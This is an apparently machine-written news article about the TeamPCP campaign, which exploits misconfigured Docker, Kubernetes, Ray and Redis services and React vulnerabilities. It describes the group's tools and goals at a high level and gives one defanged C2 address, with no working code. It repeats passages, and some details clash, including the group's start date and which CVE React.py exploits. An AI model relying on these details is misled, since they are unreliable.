Ethical Hacking News
A recent cybersecurity campaign has exposed vulnerabilities in cloud-native environments by leveraging misconfigured Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers to build a malicious infrastructure for follow-on exploitation. TeamPCP, a newly-identified threat cluster, has been linked to this activity, with their campaign exemplifying a full lifecycle of scanning, exploitation, persistence, tunneling, data theft, and monetization built specifically for modern cloud infrastructure.
Cybersecurity researchers have discovered a massive campaign targeting cloud-native environments with malicious infrastructure. The activity, described as "worm-driven," leverages exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers. TeamPCP, the attributed threat cluster, has been active since at least November 2025 and has 700 members in its Telegram channel. The group's goals are to build a distributed proxy, scan infrastructure, compromise servers for data theft, deploy ransomware, and mine cryptocurrency. TeamPCP functions as a cloud-native cybercrime platform, exploiting misconfigured APIs, Kubernetes clusters, and vulnerable React applications. The compromised infrastructure is used for various purposes, including cryptocurrency mining, data hosting, proxy relays, and tunneling utilities. Proxy.sh is a key tool that installs proxy, P2P, and tunneling utilities and delivers scanners to search the internet for vulnerable servers. The group's payloads include scanner.py, mine.sh, kube.py, React.py, and pcpcat.py, which exploit various vulnerabilities and conduct different types of attacks. TeamPCP primarily targets AWS and Microsoft Azure environments, focusing on infrastructure rather than specific industries. The group blends infrastructure exploitation with data theft and extortion, using leaked data to fuel ransomware, fraud, and cybercrime reputation building.
Cybersecurity researchers have been on high alert, as they have discovered a "massive campaign" aimed at systematically targeting cloud-native environments to set up malicious infrastructure for follow-on exploitation. The activity, observed around December 25, 2025, and described as "worm-driven," leveraged exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers, along with the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) vulnerability. The campaign has been attributed to a threat cluster known as TeamPCP (aka DeadCatx3, PCPcat, PersyPCP, and ShellForce).
The origins of this nefarious group are shrouded in mystery, but it is evident that they have been active since at least November 2025. The first instance of Telegram activity was documented by Beelzebub on July 30, 2025. A whopping 700 members currently populate the TeamPCP Telegram channel, where the group publishes stolen data from diverse victims across Canada, Serbia, South Korea, the U.A.E., and the U.S.
According to Flare security researcher Assaf Morag, the operation's goals were twofold: building a distributed proxy and scanning infrastructure at scale, and then compromising servers to exfiltrate data, deploy ransomware, conduct extortion, and mine cryptocurrency. This multi-faceted approach signifies that TeamPCP functions as a cloud-native cybercrime platform, leveraging misconfigured Docker APIs, Kubernetes APIs, Ray dashboards, Redis servers, and vulnerable React/Next.js applications as primary infection pathways to breach modern cloud infrastructure and facilitate data theft and extortion.
In addition to these primary objectives, the compromised infrastructure is also utilized for various other purposes, including cryptocurrency mining, data hosting, proxy and command-and-control (C2) relays, and even tunneling utilities. This breadth of activities underscores TeamPCP's capacity to exploit not only cloud-native targets but also existing vulnerabilities in widely-used applications.
One of the key tools employed by this group is "proxy.sh," which installs proxy, peer-to-peer (P2P), and tunneling utilities, as well as delivering various scanners to continuously search the internet for vulnerable and misconfigured servers. Notably, proxy.sh performs environment fingerprinting at execution time, checking whether it is running inside a Kubernetes cluster. If such an environment is detected, the script branches into a separate execution path and drops a cluster-specific secondary payload.
Other payloads include scanner.py, which finds misconfigured Docker APIs and Ray dashboards by downloading Classless Inter-Domain Routing (CIDR) lists from a GitHub account named "DeadCatx3," as well as options to run a cryptocurrency miner ("mine.sh"). kube.py includes Kubernetes-specific functionality to conduct cluster credential harvesting and API-based discovery of resources such as pods and namespaces, followed by deploying a privileged pod on every node that mounts the host. React.py is designed to exploit the React flaw (CVE-2025-29927) to achieve remote command execution at scale.
pcpcat.py, meanwhile, aims to discover exposed Docker APIs and Ray dashboards across large IP address ranges and automatically deploy a malicious container or job that executes a Base64-encoded payload.
A C2 server node located at 67.217.57[.]240 has been linked to the operation of Sliver, an open-source C2 framework known to be abused by threat actors for post-exploitation purposes.
Data from cybersecurity company Flare indicates that TeamPCP primarily targets Amazon Web Services (AWS) and Microsoft Azure environments. The attacks are deemed opportunistic in nature, mainly focusing on infrastructure that supports their goals rather than targeting specific industries. Consequently, organizations running such infrastructure become "collateral victims" in the process.
The PCPcat campaign exemplifies a full lifecycle of scanning, exploitation, persistence, tunneling, data theft, and monetization built specifically for modern cloud infrastructure. What makes TeamPCP dangerous is not technical novelty but their operational integration and scale. In-depth analysis reveals that most of their exploits and malware are based on well-known vulnerabilities and lightly modified open-source tools.
Furthermore, this group blends infrastructure exploitation with data theft and extortion. Leaked CV databases, identity records, and corporate data are published through ShellForce to fuel ransomware, fraud, and cybercrime reputation building. This hybrid model grants the group multiple revenue streams and resilience against takedowns.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Dawn-of-a-New-Era-in-Cloud-Native-Cybercrime-Unveiling-TeamPCPs-Exploits-ehn.shtml
https://thehackernews.com/2026/02/teampcp-worm-exploits-cloud.html
https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware/
https://nvd.nist.gov/vuln/detail/CVE-2025-29927
https://www.cvedetails.com/cve/CVE-2025-29927/
https://nvd.nist.gov/vuln/detail/CVE-2025-55182
https://www.cvedetails.com/cve/CVE-2025-55182/
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
https://cybersecuritynews.com/new-pcpcat-exploiting-react2shell-vulnerability/
https://gbhackers.com/pcpcat-malware/
https://en.wikipedia.org/wiki/Advanced_persistent_threat
Published: Mon Feb 9 04:08:01 2026 by llama3.2 3B Q4_K_M
